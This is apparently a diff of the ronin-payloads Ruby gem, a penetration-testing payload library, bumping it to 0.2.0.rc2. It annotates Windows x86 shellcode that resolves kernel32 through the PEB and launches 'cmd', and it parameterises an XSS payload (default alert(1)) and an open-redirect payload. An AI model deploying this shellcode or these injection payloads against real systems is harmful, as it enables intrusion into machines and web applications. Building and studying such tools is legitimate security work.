|
|
60
|
-
"\x8B\x06"
|
|
61
|
-
"\x8B\x68\x08"
|
|
62
|
-
"\xEB\x20"
|
|
63
|
-
"\x5B"
|
|
64
|
-
"\x53"
|
|
65
|
-
"\x55"
|
|
66
|
-
"\x5B"
|
|
67
|
-
"\x81\xEB\x11\x11\x11\x11"
|
|
68
|
-
"\x81\xC3\xDA\x3F\x1A\x11"
|
|
69
|
-
"\xFF\xD3"
|
|
70
|
-
"\x81\xC3\x11\x11\x11\x11"
|
|
71
|
-
"\x81\xEB\x8C\xCC\x18\x11"
|
|
72
|
-
"\xFF\xD3"
|
|
73
|
-
"\xE8\xDB\xFF\xFF\xFF"
|
|
74
|
-
"\x63\x6d\x64"
|
|
56
|
+
@payload = "\x31\xC9" + # xor ecx,ecx
|
|
57
|
+
"\x64\x8B\x71\x30" + # mov esi,[fs:ecx+0x30]
|
|
58
|
+
"\x8B\x76\x0C" + # mov esi,[esi+0xc]
|
|
59
|
+
"\x8B\x76\x1C" + # mov esi,[esi+0x1c]
|
|
60
|
+
"\x8B\x36" + # mov esi,[esi]
|
|
61
|
+
"\x8B\x06" + # mov eax,[esi]
|
|
62
|
+
"\x8B\x68\x08" + # mov ebp,[eax+0x8]
|
|
63
|
+
"\xEB\x20" + # jmp short 0x35
|
|
64
|
+
"\x5B" + # pop ebx
|
|
65
|
+
"\x53" + # push ebx
|
|
66
|
+
"\x55" + # push ebp
|
|
67
|
+
"\x5B" + # pop ebx
|
|
68
|
+
"\x81\xEB\x11\x11\x11\x11" + # sub ebx,0x11111111
|
|
69
|
+
"\x81\xC3\xDA\x3F\x1A\x11" + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
|
|
70
|
+
"\xFF\xD3" + # call ebx
|
|
71
|
+
"\x81\xC3\x11\x11\x11\x11" + # add ebx,0x11111111
|
|
72
|
+
"\x81\xEB\x8C\xCC\x18\x11" + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
|
|
73
|
+
"\xFF\xD3" + # call ebx
|
|
74
|
+
"\xE8\xDB\xFF\xFF\xFF" + # call dword 0x15
|
|
75
|
+
"\x63\x6d\x64" # db "cmd"
|
|
75
76
|
end
|
|
76
77
|
|
|
77
78
|
end
|
|
@@ -37,11 +37,14 @@ module Ronin
|
|
|
37
37
|
Simply redirects to https://google.com/.
|
|
38
38
|
DESC
|
|
39
39
|
|
|
40
|
+
param :url, default: 'https://google.com/',
|
|
41
|
+
desc: 'The open redirect URL'
|
|
42
|
+
|
|
40
43
|
#
|
|
41
44
|
# Builds the Open Redirect test payload.
|
|
42
45
|
#
|
|
43
46
|
def build
|
|
44
|
-
@payload =
|
|
47
|
+
@payload = params[:url]
|
|
45
48
|
end
|
|
46
49
|
|
|
47
50
|
end
|
|
@@ -37,11 +37,14 @@ module Ronin
|
|
|
37
37
|
Simply calls `alert(1)`.
|
|
38
38
|
DESC
|
|
39
39
|
|
|
40
|
+
param :javascript, default: 'alert(1)',
|
|
41
|
+
desc: 'The JavaScript to inject'
|
|
42
|
+
|
|
40
43
|
#
|
|
41
44
|
# Builds the XSS test payload.
|
|
42
45
|
#
|
|
43
46
|
def build
|
|
44
|
-
@payload =
|
|
47
|
+
@payload = params[:javascript]
|
|
45
48
|
end
|
|
46
49
|
|
|
47
50
|
end
|
data/lib/ronin/payloads/cli.rb
CHANGED
|
@@ -20,6 +20,7 @@
|
|
|
20
20
|
#
|
|
21
21
|
|
|
22
22
|
require 'ronin/payloads/version'
|
|
23
|
+
require 'ronin/core/cli/help/banner'
|
|
23
24
|
|
|
24
25
|
require 'command_kit/commands'
|
|
25
26
|
require 'command_kit/commands/auto_load'
|
|
@@ -40,6 +41,7 @@ module Ronin
|
|
|
40
41
|
namespace: "#{self}::Commands"
|
|
41
42
|
)
|
|
42
43
|
include CommandKit::Options::Version
|
|
44
|
+
include Core::CLI::Help::Banner
|
|
43
45
|
|
|
44
46
|
command_name 'ronin-payloads'
|
|
45
47
|
version Ronin::Payloads::VERSION
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: ronin-payloads
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.2.0.
|
|
4
|
+
version: 0.2.0.rc2
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Postmodern
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2024-
|
|
11
|
+
date: 2024-07-03 00:00:00.000000000 Z
|
|
12
12
|
dependencies:
|
|
13
13
|
- !ruby/object:Gem::Dependency
|
|
14
14
|
name: ronin-support
|